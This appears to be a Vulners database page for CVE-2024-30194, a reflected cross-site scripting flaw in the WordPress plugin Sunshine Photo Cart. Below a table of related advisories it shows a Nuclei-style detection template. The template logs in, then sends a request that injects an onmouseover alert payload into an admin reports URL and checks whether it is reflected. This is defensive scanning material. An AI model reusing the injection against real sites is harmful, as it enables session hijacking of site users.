| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2024-30194 | 3 Jan 202621:50 | – | circl | |
| WordPress Plugin Sunshine Photo Cart 跨站脚本漏洞 | 27 Mar 202400:00 | – | cnnvd | |
| CVE-2024-30194 | 27 Mar 202406:40 | – | cve | |
| CVE-2024-30194 WordPress Sunshine Photo Cart plugin <= 3.1.1 - Reflected Cross Site Scripting (XSS) vulnerability | 27 Mar 202406:40 | – | cvelist | |
| EUVD-2024-28126 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-30194 | 27 Mar 202407:15 | – | nvd | |
| CVE-2024-30194 | 27 Mar 202407:15 | – | osv | |
| WordPress Sunshine Photo Cart Plugin <= 3.1.1 is vulnerable to Cross Site Scripting (XSS) | 25 Mar 202400:00 | – | patchstack | |
| PT-2024-23242 | 26 Mar 202400:00 | – | ptsecurity | |
| CVE-2024-30194 | 5 Feb 202509:41 | – | redhatcve |
id: CVE-2024-30194
info:
name: Sunshine Photo Cart <= 3.1.1 - Reflected Cross-Site Scripting
author: 0xanis
severity: medium
description: |
WP Sunshine Sunshine Photo Cart versions up to 3.1.1 contain a cross-site scripting caused by improper neutralization of input during web page generation, letting attackers execute malicious scripts in users' browsers, exploit requires attacker to craft malicious input.
impact: |
Attackers can execute malicious scripts in users' browsers, leading to session hijacking, defacement, or redirection.
remediation: |
Update to the latest version of Sunshine Photo Cart.
reference:
- https://wpscan.com/vulnerability/8fe6645b-c11d-4075-89c1-f6a01dfb3a0e/
- https://patchstack.com/database/vulnerability/sunshine-photo-cart/wordpress-sunshine-photo-cart-plugin-3-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-30194
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-30194
epss-score: 0.00727
epss-percentile: 0.49698
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
vendor: wpsunshine
product: sunshine-photo-cart
framework: wordpress
tags: cve,cve2024,wordpress,wp-plugin,xss,sunshine-photo-cart,authenticated,vkev
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP+Cookie+check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(tolower(all_headers), "wordpress_logged_in")'
condition: and
internal: true
- raw:
- |
GET /wp-admin/edit.php?post_type=sunshine-gallery&page=sunshine-reports&report=orders%22%20onmouseover=alert(document.domain)%3Bthis.remove()%3B%20style=position:fixed%3Bleft:0%3Btop:0%3Bwidth:100vw%3Bheight:100vh%3B HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "onmouseover=alert(document.domain);this.remove(); style=position:fixed;left:0;top:0;width:100vw;height:100vh;", "Sunshine Photo Cart")'
condition: and
# digest: 4a0a00473045022037a1b209d91c400859ee575a2122385c81395c7083d1ebcae73259773290f9ba022100ac46c1930c7394888f0d1a02de00d8dc392c165f138b4a866689a2b908352200:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation